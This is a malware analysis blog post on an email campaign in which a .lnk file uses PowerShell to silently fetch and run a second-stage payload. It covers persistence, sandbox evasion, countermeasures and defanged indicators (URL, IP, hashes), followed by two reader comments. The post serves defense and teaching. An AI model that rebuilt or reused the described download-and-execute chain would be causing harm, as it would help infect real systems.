Malware Employs PowerShell to Infect Systems

Email is one of the favorite methods used by attackers to infect systems. The malware used in email campaigns is often ransomware or banking malware.

We have recently seen some interesting tactical changes, including:

  • Attachments with the malicious executable inside.
  • Microsoft Office documents that contain a malicious macro. The macro will download ransomware or banking malware after execution.
  • JavaScript files, executed by Wscript in Windows, dropping, for example, Locky ransomware.

We analyzed one recent email campaign with an attached .rar file. Inside this file, we found a .lnk file, which after executing uses PowerShell to download a second stage of malware.

Let’s take a look at the .lnk file:

File charasteristics
.Lnk file characteristics.

While investigating the file we saw this command:

Power Shell execution
PowerShell execution.

This command executes if the file is run:

Command Execution
Command execution.

The .lnk file perform the following:

  • Opens a hidden window.
  • Downloads a file from the domain http://anonfile[.]xyz/f/7f58d7dddec4b72bab0fb27cd852593e[.]exe
  • Saves the file in the %TEMP% as “windows.scr.”
  • Executes the downloaded file.

It’s possible to retrieve the file directly:

Retrieving the file
Retrieving the file without executing the .lnk file.

 

Analyzing the dropped malware 

Continuing with our analysis:

Executing the file
Executing the file.

The downloaded file, %TEMP%\Windows.src, is executed by cmd.exe.

During execution the malware makes some changes to the infected machine. These changes will survive after the system is rebooted. The mechanism to persist creates an automatic task in the system using schtasks.

If we take a look at the binary we can extract its properties:

File properties
File properties.

The malware is protected by the .NET obfuscator Smart Assembly, making it difficult to reverse engineer the malware and easily extract more information.

We can load the malware to see more properties:

File loaded
Further file properties, showing functions and methods with obfuscation.

 

PowerShell plus .lnk offers stealth on many sandbox systems

Some companies and security researchers use crawlers and other steps for automatic malware analysis. We tried to run this sample in some popular sandboxes to see its behavior. The analysis failed for some of them due to a few reasons:

  • The sandbox did not have PowerShell, so the .lnk could not download the malware.
  • The .lnk failed when the sandbox tried to run it.
  • The sandbox did not support .lnk files.

Thus in a real environment a sandbox might fail to determine whether this file is malicious.

One example of an error during execution:

Error Windows

The ideal scenario is to prepare the sandbox machine with PowerShell and ensure that it can execute .lnk files to see if they show malicious behavior.

 

Countermeasures

To protect an organization, several countermeasures are effective against this type of threat.

  • Modify the policy for execution in PowerShell, using the administrative templates.
  • Allow the execution only of signed PowerShell scripts.
  • Do not allow the saving of unknown .exe files in the %TEMP% folder.
  • Do not allow the execution on unknown .exe files.
  • Apply Windows restrictions such as AppLocker.

The idea is to capture some indicators of malicious activity performed on the infected machine and network to block the malware in your organization, and to combat similar future threats.

We found the malware connecting to IP address 174[.]127[.]99[.]183. This IP is located in the United States and shows other malicious activity, as we saw with VirusTotal:

Virus Total results
VirusTotal results.

After your investigation, you can use the indicators of compromise you find and apply countermeasures.

Hashes used during this analysis:

  • 846e9c0631139cfdcbf270f8bdc08cdd39e9a89d
  • 6c41bf5ead73e98c56397c37114f2c5a46fd2640

 

 

2 comments on “Malware Employs PowerShell to Infect Systems

  • Doesn't -ExecutionPolicy Bypass defeat these two suggestions?

    -Modify the policy for execution in PowerShell, using the administrative templates.
    -Allow the execution only of signed PowerShell scripts.

    Reply
  • Outstanding paper. Have you ever seen malware with more stealthy method and download dropper over HTTPS connection? Will it be able to bypass such cisco device as Scansafe? In that case, what the the recommended tactics for us?

    Beside, can you share the VirusTotal inquiry script as above? It's pretty neat and really useful for me. I have my private API already.

    Reply

Leave a Comment

one × 4 =